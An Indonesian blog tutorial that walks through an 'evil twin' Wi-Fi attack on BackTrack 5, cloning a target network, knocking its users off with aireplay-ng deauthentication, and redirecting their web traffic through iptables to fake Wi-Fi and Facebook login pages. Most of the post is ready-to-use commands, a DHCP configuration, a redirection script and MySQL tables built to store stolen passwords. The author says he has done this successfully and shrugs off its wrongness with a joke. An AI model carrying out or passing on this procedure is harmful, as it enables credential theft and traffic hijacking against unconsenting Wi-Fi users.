- Operating system linux (backtrack), saya menggunakan backtrack 5 R1
- Database dengan nama dan tabel.
- dhcp3-server
- Apache, untuk menjalankan halaman login kita
- Mysql, untuk menyimpan inputan user sebagai hasil dari usaha kita
- Sudah terkoneksi ke sebuah Hospot (wifi) yang internet access, untuk mendapatkan IP
_^
Sunday, 15 February 2015 |
1 comments
Advertisement
Mungkin judulnya agak aneh, tapi kagak tau judul apa yang bagus, jadi saya mengambil keputusan untuk membuat judul dengan bahasa yang sesuai dengan pemahaman saya sendiri. Cara yang akan saya jabarkan ini sudah pernah saya praktekkan dan alhmadulillah berhasil dan berjalan dengan lancar, sebelumnya cara tutorial ini juga sama dengan tutorial saya sebelumnya tentang hacking wpa2 evil twin, tapi menurut saya cara yang saya paparka itu terlalu ribet, dan banyak menghabiskan waktu, setelah saya perhatikan baik baik dari rujukan saya dan mencoba untuk mengkombinasikan semua tutorial itu, akhirnya saya temukan jalan pintasnya, berikut langkah langkahnya.
Cara kerjanya sebenarnya kita menduplikat wifi target dan mengarahkan serta memaksa user wifi target untuk login dengan wifi palsu buatan kita yang kita buat percis dengan wifi target.
Bahan bahan yang dibutuhkan sudah saya cantumkan di link bawah dari tutorial ini, anda bisa mendownloadnya dari sana. Untuk file download itu anda letakkan di file system – var – www. Ingat !, filenya yang anda letakkan disana, bukan foldernya. File arminaven.sh anda letakkan di root.
Yang diperlukan adalah
Langkah langkahnya adalah sebagai berikut:
Aktifkan apacehe dan mysql kita. Tepatnya di :
Aplication – backtrack – services – httpd – start apache
Aplication – backtrack – services – mysql - start mysql
Masuk ke mysql dengan mengetik di konsole:
Mysql – root –p dan enter, password standarnya adalah toor, Selanjutnya Buat database dengan nama database “arminaven”, nama tabel “wifi”, kebetulan saya membuat dua halaman login sekaligus, jadi dalam database “arminaven” kita buat lagi tabel dengan nama “facebook”. Berikut caranya:
Masuk dulu ke
create database arminaven;
use arminaven;
create table wifi(username VARCHAR(64), wifi_name VARCHAR(64), wifi_password VARCHAR(64), wifi_password_confirmation VARCHAR(64));
use arminaven;
create table facebook(username VARCHAR(64), password VARCHAR(64));
setelah kita buat database, kita selanjutnya menginstal dhcp3-server dengan syntak berikut ini:
apt-get install dhcp3-server -y
selanjutnya kita edit dengan cara berikut ini:
gedit /etc/dhcp3/dhcpd.conf
isikan dengan berikut ini:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 8.8.8.8;
range 192.168.1.130 192.168.1.140;
}
Oya, hampri lupa, sebelumnya kita telah menentukan target yang akan kita duplikat, jika belum tau cara melihat wifi yang ada, anda bisa melihatnya dengan mengetik syntak:
Airmon-ng start wlan0
Airodump-ng mon0
Anda akan melihat wifi yang ada, dan catat wifi yang akan anda dupikat, yaitu chanelnya, bssidnya. Cukup itu aja, selanjutnya matikan interface anda dengan cara berikut:
airmon-ng stop mon0
airmon-ng stop wlan0
selanjutnya kita mulai menduplikat wifi,
gini caranya:
airmon-ng start wlan0 1
angka 1 merupakn chanel kita, kita sesuaikan dengan target yang kita duplikat, lalu dilanjutkan dengan membuat wifi palsu kita.
airbase-ng -e "Arminaven" -c 1 mon0
disini saya membuat wifi dengan nama saya “arminaven”, sebenarnya nama wifi yang kita buat adalah sesuai dengan nama target wifi yang akan jadi eksperimen kita. Wifi kita akan terlihat di PC user jika sinyal wifi kita sampai ke PC nya, jadi ukuran nampak enggaknya wifi kita juga di tentukan oleh kewalitas radius wifi bawaan PC kita, bisa dipahami maksud ane kannnn???
Kita lanjutkan ke tahap selanjutnya. Setelah dhcp3-server kita install dan atur sesuai dengan yang diatas, selanjutnya kita buat pengaturan seperti berikut untuk mengarahkan user ke halaman login kita saat mengakses situs apa aja, misalnya google.com, facebook.com dan lain sebagainya. Yang pasti harus pake www.namasitu.com dechhh..kalo gak dibuat begitu. Akan ada pemberitahuan error di pc user, moga moga ja user mengunjungi situs tertentu J.
Kembali lagi ke topik permasalan, jadi untuk mengarahkan user ke halaman login kita, maka kita atur agar user mengakses IP kita. Kita buat dulu sebuah file dengan nama ekstensi *.sh. kebetulan yang ane buat namanya arminaven.sh yang dapat anda lihat di file download di bawah. Dalam file arminaven.sh tersebut berisi kode berikut ini:
#!/bin/bash
ifconfig at0 up
ifconfig at0 192.168.1.129 netmask 255.255.255.128
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --table nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.5:80
iptables -t nat -A POSTROUTING -j MASQUERADE
/etc/init.d/dhcp3-server start
Yang perlu anda ganti hanyalah 192.168.1.5 karena itu adalah IP saya dengan koneksi ke sebuah wifi dengan interface wlan0, anda tinggal menggantinya dengan IP anda, saya yakin sudah tahu cara melihat Ipnya, kalo ada yang belum tahu, coba ketik ifconfig maka akan muncul IP anda jika anda sudah konek. jika anda menggunakan koneksi selain wifi saya tidak tahu bagaimana pengaturannya, begitu juga jika anda menggunakan koneksi dengan modem. Tapi bagi yang sudah pernah melakukanna, silahkan share di kolom komentar J. Oyaaa, file arminaven.sh ini kita letakkan di ROOT, atau homenya backtrack. Setelah kita letakkan disana, maka kita mulai menjalankan file tersebut dengan cara membuka konsole baru dan ketik:
Bash arminaven.sh
Maka dhcp3-server kita akan di jalankan dan kita melangkah ke tahap pemaksaa user mengakses wifi siluman kita J J.
Sudah tahu belum caranya???. Kita tinggal melakukan aireplay-ng. Lengkapnya gini aja deh
Airodump-ng mon0
Setelah muncul hospot yang ada, termasuk wifi siluman kita, maka yang perlu kita gunakan adalah bssid target kita dengan kliennya. Umpamanya bssidnya 00:01:12:23:34:45 dan kliennya A1:2B:5A:D4:2C:11 maka kita aireplay dengan cara berikut
Aireplay-ng -0 0 –e 00:01:12:23:34:45 –c A1:2B:5A:D4:2C:11 mon0
Maka user akan terputus, saat dia mencoba mengkonekkan ke wifi kita, maka saat dia mengakses situs akan di arahkan ke halaman login wifi kita, dan tentunya tinggal manen aja kita nantinya, namun yang perlu di perhatikan adalah, KONEKSI KITA JANGAN SAMPAI PUTUS. Karena user sebenarnya mengakses IP kita.
Kita anggap user sudah mengakses wifi kita sekarang kita masuk ke database kita, caranya seperti diatas, lebih lengkapnya gini aja dech:
Mysql –u root –p
Show databases;
Use arminaven;
Show tables;
Select * from wifi;
Entar disana kita lihat hasilnya, jika user terkecoh, boleh jadi dia juga mengkases facebook palsu kita, untuk memastikannya kita periksa aja database kita:
Show tables;
Select *from facebook;
Tarrraaaaa...!!!!
Itu lah hasilnya, semoga artikel ini bermanfaat, ini bukan sebuah tindakan pencurian, tapi ini adalah sebuah resiko tekhnologi, maksud saya begini, setelah saya googling sana sini, ada sebuah artikel yang mengatakan radiasi sinyal wifi tidak baik untuk kesehatan, jadi seharusnya pemilik hospot wifi tidak menebar penyakit dengan menebarkan sinyal wifi, jika sinyal itu tidak bisa di atasi melayang layang di atap anak kos, maka relakanlah untuk turut dinikmati bersama – sama kwakakaka J.
wassalam
link download
1 comments:
belajar Hack Wifi
Post a Comment